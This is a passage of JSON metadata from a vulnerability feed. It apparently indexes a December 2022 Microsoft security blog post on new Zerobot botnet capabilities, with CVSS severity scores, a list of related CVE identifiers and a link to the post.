"bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MMPC:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
CVE-2018-12613
